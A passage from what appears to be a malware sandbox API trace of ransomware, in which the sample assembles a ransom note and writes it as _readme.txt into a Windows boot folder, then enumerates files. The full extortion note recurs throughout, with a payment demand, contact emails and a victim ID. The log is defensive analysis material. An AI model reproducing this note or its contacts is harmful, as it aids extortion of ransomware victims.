you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.178] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.178] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x32acff0 [0056.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32acff0, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x326aa18 [0056.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.179] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.179] WriteFile (in: hFile=0x5c8, lpBuffer=0x326aa18*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x326aa18*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.180] CloseHandle (hObject=0x5c8) returned 1 [0056.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.180] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.180] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.180] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.180] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.180] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.180] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.181] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 